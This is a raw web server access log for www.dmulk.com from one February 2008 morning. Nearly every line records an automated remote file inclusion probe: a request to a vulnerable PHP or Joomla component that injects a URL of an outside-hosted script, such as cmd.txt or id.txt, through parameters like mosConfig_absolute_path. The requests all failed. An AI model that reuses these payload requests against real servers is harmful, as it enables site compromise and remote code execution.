193.17.14.194 - - [22/Feb/2008:05:01:36 -0800] "GET /logs/access_071221.log/convert/mvcw.php?step=1&vwar_root=www.hotoilstocks.com/components/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.121.21.39 - - [22/Feb/2008:05:01:54 -0800] "GET /logs//myevent.php?myevent_path=http://kaizo.hut2.ru/new/ro.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
128.121.21.39 - - [22/Feb/2008:05:01:55 -0800] "GET /logs//myevent.php?myevent_path=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
128.121.21.39 - - [22/Feb/2008:05:01:57 -0800] "GET //myevent.php?myevent_path=http://kaizo.hut2.ru/new/ro.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
128.121.21.39 - - [22/Feb/2008:05:01:57 -0800] "GET //myevent.php?myevent_path=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
222.122.161.179 - - [22/Feb/2008:05:02:08 -0800] "GET /logs/access_080211.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.161.179 - - [22/Feb/2008:05:02:08 -0800] "GET /logs/access_080211.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.161.179 - - [22/Feb/2008:05:02:08 -0800] "GET /logs/access_080211.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.161.179 - - [22/Feb/2008:05:02:08 -0800] "GET /logs/access_080211.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.161.179 - - [22/Feb/2008:05:02:08 -0800] "GET /logs/access_080211.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.161.179 - - [22/Feb/2008:05:02:08 -0800] "GET /logs/access_080211.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.160.16.3 - - [22/Feb/2008:05:02:14 -0800] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.167.147.2 - - [22/Feb/2008:05:02:17 -0800] "GET /logs/access_071219.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.221 - - [22/Feb/2008:05:02:41 -0800] "GET /logs/access_071211.log HTTP/1.0" 200 128565 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.55.147.205 - - [22/Feb/2008:05:03:00 -0800] "GET /logs/access_080211.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.55.147.205 - - [22/Feb/2008:05:03:00 -0800] "GET /logs//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.183.41 - - [22/Feb/2008:05:03:04 -0800] "GET /logs/access_080211.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.amdgchoir.com/phpbb/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.197.232.86 - - [22/Feb/2008:05:03:16 -0800] "GET /logs/access_080211.log/scanhttp://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.51.176 - - [22/Feb/2008:05:03:57 -0800] "GET /logs/access_080211.log//content/multithumb/multithumb?mosConfig_absolute_path=http://www.bjlfansite.be/site/media/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.51.176 - - [22/Feb/2008:05:03:58 -0800] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://www.bjlfansite.be/site/media/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.51.176 - - [22/Feb/2008:05:03:58 -0800] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://www.bjlfansite.be/site/media/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.193.222.218 - - [22/Feb/2008:05:03:59 -0800] "GET /logs/access_080126.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.218 - - [22/Feb/2008:05:03:59 -0800] "GET /logs/access_080126.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.218 - - [22/Feb/2008:05:03:59 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.218 - - [22/Feb/2008:05:03:59 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.218 - - [22/Feb/2008:05:04:00 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.218 - - [22/Feb/2008:05:04:00 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.51.176 - - [22/Feb/2008:05:04:01 -0800] "GET /logs/access_080122.log//content/multithumb/multithumb?mosConfig_absolute_path=http://www.bjlfansite.be/site/media/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.167.147.2 - - [22/Feb/2008:05:04:16 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.51.87.246 - - [22/Feb/2008:05:05:02 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.226.103.41 - - [22/Feb/2008:05:05:10 -0800] "GET /logs/access_080211.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.226.103.41 - - [22/Feb/2008:05:05:11 -0800] "GET //administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.226.103.41 - - [22/Feb/2008:05:05:11 -0800] "GET /logs//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.193.222.218 - - [22/Feb/2008:05:05:30 -0800] "GET /logs/access_080123.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.218 - - [22/Feb/2008:05:05:30 -0800] "GET /logs/access_080123.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.218 - - [22/Feb/2008:05:05:33 -0800] "GET /logs/access_080126.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.218 - - [22/Feb/2008:05:05:34 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.218 - - [22/Feb/2008:05:05:34 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.122.68.50 - - [22/Feb/2008:05:05:59 -0800] "GET /logs/access_080108.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.122.68.50 - - [22/Feb/2008:05:06:00 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.167.147.2 - - [22/Feb/2008:05:06:08 -0800] "GET /logs/access_080118.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.55.147.205 - - [22/Feb/2008:05:06:22 -0800] "GET /logs/access_080201.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.191.43.42 - - [22/Feb/2008:05:06:46 -0800] "GET /logs/access_080211.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.191.43.42 - - [22/Feb/2008:05:06:47 -0800] "GET //administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.191.43.42 - - [22/Feb/2008:05:06:48 -0800] "GET /logs//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.226.103.41 - - [22/Feb/2008:05:06:48 -0800] "GET /logs/access_080201.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.52.236.0 - - [22/Feb/2008:05:06:49 -0800] "GET /logs/access_080211.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.193.222.218 - - [22/Feb/2008:05:06:50 -0800] "GET /logs/access_080123.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.52.236.0 - - [22/Feb/2008:05:06:50 -0800] "GET //administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.52.236.0 - - [22/Feb/2008:05:06:51 -0800] "GET /logs//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.197.232.86 - - [22/Feb/2008:05:06:54 -0800] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.197.232.86 - - [22/Feb/2008:05:06:59 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.197.232.86 - - [22/Feb/2008:05:06:59 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.197.232.86 - - [22/Feb/2008:05:07:00 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.216.88 - - [22/Feb/2008:05:08:07 -0800] "GET /logs/access_080117.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.51.87.246 - - [22/Feb/2008:05:08:09 -0800] "GET /logs/access_080122.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.51.87.246 - - [22/Feb/2008:05:08:10 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.51.87.246 - - [22/Feb/2008:05:08:11 -0800] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.168.74.131 - - [22/Feb/2008:05:08:31 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
70.168.74.131 - - [22/Feb/2008:05:08:31 -0800] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
85.214.80.254 - - [22/Feb/2008:05:08:37 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
85.214.80.254 - - [22/Feb/2008:05:08:38 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
81.191.43.42 - - [22/Feb/2008:05:08:38 -0800] "GET /logs/access_080201.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.160.16.3 - - [22/Feb/2008:05:08:53 -0800] "GET /logs/access_080129.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [22/Feb/2008:05:08:54 -0800] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [22/Feb/2008:05:08:55 -0800] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
124.217.247.166 - - [22/Feb/2008:05:09:06 -0800] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.51.87.246 - - [22/Feb/2008:05:09:09 -0800] "GET /logs/access_080211.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.160.16.3 - - [22/Feb/2008:05:09:13 -0800] "GET /logs/access_071216.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.91.198.51 - - [22/Feb/2008:05:09:54 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/durhaka/cmdasca.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
85.214.80.254 - - [22/Feb/2008:05:10:46 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
85.214.80.254 - - [22/Feb/2008:05:10:46 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
70.168.74.131 - - [22/Feb/2008:05:11:22 -0800] "GET /logs/include.php?cmsdir=http://www.consultorias.biz/ray/candaops.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.168.74.131 - - [22/Feb/2008:05:11:23 -0800] "GET /include.php?cmsdir=http://www.consultorias.biz/ray/candaops.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.33.49.76 - - [22/Feb/2008:05:11:56 -0800] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
64.33.49.76 - - [22/Feb/2008:05:11:58 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
83.52.236.0 - - [22/Feb/2008:05:12:20 -0800] "GET /logs/access_080201.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.167.147.2 - - [22/Feb/2008:05:13:54 -0800] "GET /logs/access_080122.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.167.147.2 - - [22/Feb/2008:05:14:00 -0800] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.40.97.20 - - [22/Feb/2008:05:15:15 -0800] "GET /logs/access_080123.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.97.20 - - [22/Feb/2008:05:15:15 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.97.20 - - [22/Feb/2008:05:15:16 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.19.173 - - [22/Feb/2008:05:15:22 -0800] "GET /bikes/GPS/WeSTOC2006/?M=A HTTP/1.0" 200 833 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
78.40.97.20 - - [22/Feb/2008:05:15:24 -0800] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.97.20 - - [22/Feb/2008:05:15:25 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.97.20 - - [22/Feb/2008:05:15:25 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.167.147.2 - - [22/Feb/2008:05:15:37 -0800] "GET /logs/access_080211.log/content/multithumb/multithumb?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.55.147.205 - - [22/Feb/2008:05:15:52 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
18.55.2.206 - - [22/Feb/2008:05:16:21 -0800] "GET /index.php?option=com_joomlaxplorer&Itemid=&mosConfig_absolute_path=http://nybap.org/templates/rose.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
18.55.2.206 - - [22/Feb/2008:05:16:22 -0800] "GET /logs/index.php?option=com_joomlaxplorer&Itemid=&mosConfig_absolute_path=http://nybap.org/templates/rose.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
64.22.101.222 - - [22/Feb/2008:05:16:44 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.101.222 - - [22/Feb/2008:05:16:44 -0800] "GET /logs/access_071225.log/errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.101.222 - - [22/Feb/2008:05:16:44 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.101.222 - - [22/Feb/2008:05:16:44 -0800] "GET /errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.101.222 - - [22/Feb/2008:05:16:44 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.101.222 - - [22/Feb/2008:05:16:45 -0800] "GET /logs/errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.101.222 - - [22/Feb/2008:05:16:59 -0800] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.101.222 - - [22/Feb/2008:05:16:59 -0800] "GET /logs/access_071220.log/errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
222.96.156.153 - - [22/Feb/2008:05:17:26 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
222.96.156.153 - - [22/Feb/2008:05:17:26 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
